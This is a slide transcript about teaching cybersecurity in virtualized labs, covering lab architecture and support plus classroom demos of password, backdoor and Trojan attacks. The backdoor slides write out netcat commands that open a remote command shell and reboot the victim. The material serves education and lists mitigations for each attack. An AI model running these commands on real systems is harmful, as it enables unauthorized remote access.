Cybersecurity Training in a Virtual Environment By Chinedum Irrechukwu.

Slides:



Advertisements
Similar presentations
Chapter 20 Oracle Secure Backup.
Advertisements

1 Chapter 8 Fundamentals of System Security. 2 Objectives In this chapter, you will: Understand the trade-offs among security, performance, and ease of.
Reducing Total Cost of Ownership (TCO) Mike Chon AM Computers.
15.1 © 2004 Pearson Education, Inc. Exam Managing and Maintaining a Microsoft® Windows® Server 2003 Environment Lesson 15: Configuring a Windows.
Understand Virtualized Clients Windows Operating System Fundamentals LESSON 2.4.
Introduction to Unix GLY 560: GIS for Earth Scientists Class Home Page:
Lesson 11-Virtual Private Networks. Overview Define Virtual Private Networks (VPNs). Deploy User VPNs. Deploy Site VPNs. Understand standard VPN techniques.
Microsoft virtual machine converter
Thin Client vs. Desktop Advantages and Disadvantages of Operating System Environments.
Presented by Sujit Tilak. Evolution of Client/Server Architecture Clients & Server on different computer systems Local Area Network for Server and Client.
Virtualization for Cloud Computing
© 2010 VMware Inc. All rights reserved VMware ESX and ESXi Module 3.
Patch Management Module 13. Module You Are Here VMware vSphere 4.1: Install, Configure, Manage – Revision A Operations vSphere Environment Introduction.
VMware vCenter Server Module 4.
1 MASTERING (VIRTUAL) NETWORKS A Case Study of Virtualizing Internet Lab Avin Chen Borokhovich Michael Goldfeld Arik.
Virtual Machine Management
Using Virtualization in the Classroom. Using Virtualization in the Classroom Session Objectives Define virtualization Compare major virtualization programs.
Hands-On Microsoft Windows Server 2008 Chapter 1 Introduction to Windows Server 2008.
Real Security for Server Virtualization Rajiv Motwani 2 nd October 2010.
Network+ Guide to Networks 6 th Edition Chapter 10 Virtual Networks and Remote Access.
Securing Windows 7 Lesson 10. Objectives Understand authentication and authorization Configure password policies Secure Windows 7 using the Action Center.

Hands-On Microsoft Windows Server 2008 Chapter 1 Introduction to Windows Server 2008.
Module 4: Add Client Computers and Devices to the Network.
Firewalls Paper By: Vandana Bhardwaj. What this paper covers? Why you need a firewall? What is firewall? How does a network firewall interact with OSI.
Virtualization Dr. John P. Abraham Professor. Grid computing Multiple independent computing clusters which act like a “grid” because they are composed.
DIY: Your First VMware Server. Introduction to ESXi, VMWare's free virtualization Operating System.
© 2010 VMware Inc. All rights reserved Patch Management Module 13.
Introduction to VMware Virtualization
Remote Access Chapter 4. Learning Objectives Understand implications of IEEE 802.1x and how it is used Understand VPN technology and its uses for securing.
Remote Access Chapter 4. Learning Objectives Understand implications of IEEE 802.1x and how it is used Understand VPN technology and its uses for securing.
An Introduction to IBM Systems Director
Using Virtualization in the Classroom. Using Virtualization in the Classroom Session Objectives Define virtualization Compare major virtualization programs.
Section 1: Introducing Group Policy What Is Group Policy? Group Policy Scenarios New Group Policy Features Introduced with Windows Server 2008 and Windows.
Module 7: Fundamentals of Administering Windows Server 2008.
| nectar.org.au NECTAR TRAINING Module 5 The Research Cloud Lifecycle.
Module 11: Remote Access Fundamentals
The Open Source Virtual Lab: a Case Study Authors: E. Damiani, F. Frati, D. Rebeccani, M. Anisetti, V. Bellandi and U. Raimondi University of Milan Department.
Security at NCAR David Mitchell February 20th, 2007.
Network and Perimeter Security Paula Kiernan Senior Consultant Ward Solutions.
1 Introduction to Microsoft Windows 2000 Windows 2000 Overview Windows 2000 Architecture Overview Windows 2000 Directory Services Overview Logging On to.
An iterative approach to Desktop Virtualization By Mike Cave, Acting Chief Information Officer CA Department of Toxic Substances Control.
Oracle 10g Database Administrator: Implementation and Administration Chapter 2 Tools and Architecture.
Presented by: Reem Alshahrani. Outlines What is Virtualization Virtual environment components Advantages Security Challenges in virtualized environments.
1 Security Penetration Testing Angela Davis Mrinmoy Ghosh ECE4112 – Internetwork Security Georgia Institute of Technology.
Module 4 Planning for Group Policy. Module Overview Planning Group Policy Application Planning Group Policy Processing Planning the Management of Group.
Core 3: Communication Systems. Network software includes the Network Operating Software (NOS) and also network based applications such as those running.
Computer Security Risks for Control Systems at CERN Denise Heagerty, CERN Computer Security Officer, 12 Feb 2003.
Module 10: Windows Firewall and Caching Fundamentals.
Chapter 9: Networking with Unix and Linux. Objectives: Describe the origins and history of the UNIX operating system Identify similarities and differences.
Introduction TO Network Administration
Mark Shtern.  Our life depends on computer systems  Traffic control  Banking  Medical equipment  Internet  Social networks  Growing number of.
Virtual Machines. A virtual machine takes the layered approach to its logical conclusion. It treats hardware and the operating system kernel as though.
Information Systems CS-507 Lecture 32. Physical Intrusion The intruder could physically enter an organization to steal information system assets or carry.
Securing a Host Computer BY STEPHEN GOSNER. Definition of a Host  Host  In networking, a host is any device that has an IP address.  Hosts include.
Vmware 2V0-621D Vmware Exam Questions & Answers VMware Certified Professional 6 Presents
SemiCorp Inc. Presented by Danu Hunskunatai GGU ID #
VIRTUAL MACHINE – VMWARE. VIRTUAL MACHINE (VM) What is a VM? – A virtual machine (VM) is a software implementation of a computing environment in which.
Using Virtualization in the Classroom
Barracuda SSL VPN Remote, Authenticated Access to Applications and Data.
Barracuda SSL VPN Remote, Authenticated Access to Applications and Data Version 2.6 | July 2014.
Barracuda SSL VPN Remote, Authenticated Access to Applications and Data.
Virtualization for Cloud Computing
VMware ESX and ESXi Module 3.
Backdoor Attacks.
Configuring Windows Firewall with Advanced Security
Securing the Network Perimeter with ISA 2004
FTP - File Transfer Protocol
Virtual Machines.
Radoslaw Jedynak, PhD Poland, Technical University of Radom
Presentation transcript:

Cybersecurity Training in a Virtual Environment By Chinedum Irrechukwu

Areas to be covered Brief introduction to virtualization General Benefits of virtualization Dominant vendors and common products Lab Architecture Lab technical support Lab Exercise Demonstration Summary Questions

Introduction to Virtualization A software entity can have and share access to underlying hardware resources. The software entity can be an application, a network or a virtual machine. Humans can interact with it as if it is a separate entity (e.g a separate physical machine) A software layer exists that allows for the creation and deployment of virtual machines

General Benefits Multiple guest operating systems can exist on one physical machine More productivity and less cost Additional energy and real estate cost savings Software testing before deployment (patches) Fast restore in the event of VM crash or corruption

Dominant Vendors and Common Products Vmware – VSphere, Esxi, Vcloud Director Citrix (Xen) – Xen is open source – Citrix version has an excellent management interface – Alternative choice to the VMware product line Linux Kernel Virtual Machine – High potential but no well developed management interface

Common Products for Single Users Enterprise class virtualization products – Vmware, Citrix Xen and Linux KVM can Create multiple virtual networks Allow numerous connections to the servers Allow the clustering of servers and provide a good management interface Provide a way to authenticate users Common Products for Single users – Vmware workstation, Vmware player etc – Oracle Virtualbox – Virtual PC

Lab Architecture Consists of multiple physical servers Group of servers is managed by a central server Central server should have ability to connect into an authentication server VPN might be needed for security Choice between web based connection to VM or IP based remote connection (RDP or SSH).

Lab Architecture Diagram 95a.html

Extra Notes on Lab Architecture The number of physical servers should depend on the number of students and the storage you need Cost increases with each additional server you add Consider the technical support required for the system

Lab Support Lab may require additional technical support from IT staff Both Instructors and students may need help with connectivity Students may require help with lab exercises Consider having IT staff help with this area Consider hiring teaching assistants or lab assistants to help with lab exercises

Potential Technical Issues VPN Connectivity – Installed Firewall on client PCs – Installed Internet Security (Antivirus)software on client PCs User Based Issues – Inexperienced users – Incorrectly applied instructions

Attacks Online password attack (Windows) – Attempt to crack a password on a remote system – Victim will be a windows system Backdoor attack – Insider installed malicious program that allows connections to be made to victim system Trojan attack – Malicious program that appears harmless but performs some other action

Online Password Attack (Windows) Server Message Block used for file sharing SMB clients and servers communicate about shared resources nd_Protocols.html

Online Password Attack (Contd) Attacker’s Objective – Retrieve or discover a privileged user’s password Attack Method – Automate a dictionary password attack against a Windows share – A custom script can and will be used Mitigation/Prevention/Detection – Apply maximum logon attempts – Security personnel should review log files

Online Password Attack Contd. (Demo) Nmap scan of network Enumerate shares of the Windows machines Run script that attempts to connect to share with a privileged account Connection attempt will use multiple dictionary passwords Connect to the VM using a terminal application

Online Password Attack on a Windows (Contd.) Learning Objectives – Importance of using a complex password – Importance of enforcing maximum logon attempts – Importance of renaming the administrator account – Understanding the effectiveness of social engineering Knowing the username is half the battle Aha moment!

Backdoor Attack Attacker’s objective – Execute remote commands on victim system Attack Method – Insider installs backdoor program on a victim machine – Backdoor listens for and accepts incoming connections

Backdoor Attack Contd. Mitigation/Prevention/Detection – Physical security reduces the risk – Anti-virus scans are also effective

Backdoor Attack Steps Install backdoor (netcat) on victim computer Configure backdoor to accept incoming connections – Execute “nc –l –v –p 5555 –e cmd.exe” on server or victim Connect to the victim machine – Execute “nc –vn 5555” Execute command on remote system from attack machine – Execute “shutdown –r –t 20” to shut down and restart the victim system in 20 seconds

Trojan Attack Attacker’s Objective – Successfully install or execute malware on a victim system – Trojan installs malware but pretends to be legitimate software

Trojan Attack (Contd.) Attack Method – Malicious web downloads – Attachments Mitigation/Prevention/Detection – Up to date anti-virus definitions – User training

Take Home Message Virtualization is useful for hands-on exercises. Provides flexibility to create different lab environments Cost is proportional to the number of students using the lab Lab support is useful and should be considered Virtual labs help instructors to achieve learning objectives and improve experiential learning.

Questions Any questions ???